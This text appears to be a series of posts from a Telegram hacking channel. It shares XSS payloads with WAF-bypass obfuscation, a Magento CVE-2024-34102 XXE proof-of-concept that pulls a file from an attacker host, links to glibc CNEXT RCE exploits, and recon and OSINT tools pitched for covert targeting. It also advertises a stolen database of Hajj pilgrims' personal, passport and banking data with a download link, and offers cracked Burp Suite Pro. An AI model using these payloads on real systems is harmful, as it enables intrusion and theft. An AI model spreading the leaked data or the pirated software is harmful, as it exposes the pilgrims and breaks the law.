Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.

🌎 Blog

#ATM #Malware #News
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CNEXT exploits

💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()

👁‍🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:

⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...

🗝 Exploits:
Exploits will become available as blogposts come out.

⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Exploit #Cnext
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

DOMAINIM

💬
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.

📊 Features:
⚪️ Subdomain enumeration (2 engines + bruteforcing)
⚪️ User-friendly output
⚪️ Resolving A records (IPv4)
⚪️ Virtual hostname enumeration
⚪️ Reverse DNS lookup
⚪️ Detects wildcard subdomains (for bruteforcing)
⚪️ Basic TCP port scanning
⚪️ Subdomains are accepted as input
⚪️ Export results to JSON file

🔼 Installation:

cd domainim
nimble build
./domainim <domain> [--ports=<ports>]

💻 Usage:

./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]

📂 Examples:
⚪️ ./domainim nmap.org --ports=all
⚪️ ./domainim google.com --ports=none --dns=8.8.8.8#53
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
⚪️ ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

😸 Github

⬇️ Download
🔒 BugCod3

#Pentest #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

GAP Burp Extension

💬
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.

🔼 Installation:
⚪️ Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
⚪️ Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
⚪️ On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
⚪️ Download the GAP.py and requirements.txt from this project and place in the same directory.
⚪️ nstall Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
⚪️ Go to the Extensions -> Installed and click Add under Burp Extensions.
⚪️ Select Extension type of Python and select the GAP.py file.

💻 Using:
⚪️ Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP
⚪️ you can right click a request or response in any other context and select GAP from the Extensions menu.

😸 Github

⬇️ Download
🔒 BugCod3

#BurpSuite #Extensions
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

LazyEgg - Hunting JS Files

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'

#BugBounty #Tips #CyberSec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Cross Site Scripting Xss Payload

Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--

#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

📢 Hajj and pilgrimage organization was hacked by @irleaks!


In short, we have the following from the pilgrims during the years 1363 to 1403:

- Name, surname, father's name, date of birth, place of birth, birth certificate number, national code, national card series, marital status, occupation
- Contact information (home and work address, postal code, landline and mobile phone)
- Detailed inquiry information from the passport police (passport number, date of issuance and expiration) + passport scan
- 3x4 photo of pilgrims
- Visitor flight information
- Pilgrim insurance information
- Bail document information
- Banking and payment information
- Complete information of Hajj brokers
- Information about the accommodation status of pilgrims
- Full details of government and government officials
- Full details of quota dispatch, such as the families of the martyrs
- Full details of deployment of Naja forces
- Full details of deployment of Basij forces
- Full details of spiritual missions
- The source code of the organization's programs and services

Total data volume: 1.25 TB

⬇️ Example:
https://mega.nz/file/sYg0AT7C#fbfecMm0TJSx5MF25dU5TUK8mZvdzkKhKRTsQJCs-F0

#Haj #News
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Time-Based SQL Injection

#SQL #Time_Based
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Burpsuite Pro 👁

🔥 v2024.5

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Bypassing WAF through a large number of characters is a successful method

#Bypass #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕵️ Eyes is an OSINT tool to get existing accounts from an email

About:
Eyes is osint tool based on account search from an email address

Eyes is able to find not only if an account is existing on different sites but also to find the account in question (with certain modules)

even if the profile has nothing to do with the email 😲!

All this without warning the target 🕵️‍♂️

📊 Features of noscript:
⚪️ fully async
⚪️ asynchrone scraping
⚪️ menu in cli format (commands)


📂  Requirements / Launch:
⚪️ Python 3
⚪️ Git
⚪️ New terminal (to display emojis) # only for windows

💻 Usage:

usage: eyes.py [-h] [-m] [email]

positional arguments:
  email          search information on the target email with modules, services...

options:
  -h, --help     show this help message and exit
  -m, --modules  gives you all the email modules used by Eyes

😸 Github

⬇️ Download
🔒 BugCod3

#Osint #Email
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

payload

<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">

<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">

#Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

#CVE #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SSRF localhost aliases

#SSRF #Local
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bug-Bounty-Wordlists

⬇️ Download
🔒 BugCod3

#BugBounty #Wordlist
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

This is how a Cybercriminal exploits phone calls to steal Data/OTP using IVR.

#News #Scam #Alert
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

excludeparked

💬
A lightweight Python 3 noscript that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).

This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.

🔼 Install:

cd excludeparked
pip install -r requirements.txt

💻 Usage:

python3 ./excludeparked.py -h

😸 Github

⬇️ Download
🔒BugCod3

#Python #Parked #Domain
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Simple Low-Hanging Bug:
Cache purge requests are not authenticated.

→ curl -X PURGE https://target[.]evil[.]com

→ curl -s -D - https://target[.]evil[.]com -o /dev/null

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS WAF Bypass by multi-char HTML entities

fj translates to fj
>⃒ translates to > + [?]
&nvlt; translates to < + [?]

[?] - Unicode symbol

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

dnsX

A fast and multi-purpose DNS toolkit designed for running DNS queries

💬
dnsx is a fast and multi-purpose DNS toolkit designed for running various probes through the retryabledns library. It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like shuffledns etc.

📊 Features:
⚪️ Simple and Handy utility to query DNS records.
⚪️ A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA query support
⚪️ DNS Resolution / Brute-force support
⚪️ Custom resolver input support
⚪️ Multiple resolver format (TCP/UDP/DOH/DOT) support
⚪️ stdin and stdout support
⚪️ Automatic wildcard handling support

🔼 Installation:
dnsx requires go1.21 to install successfully. Run the following command to install the latest version:

go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest

💻 Usage:

dnsx -h

😸 Github

⬇️ Download
🔒 BugCod3

#cli #dns #bruteforce #wildcard
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3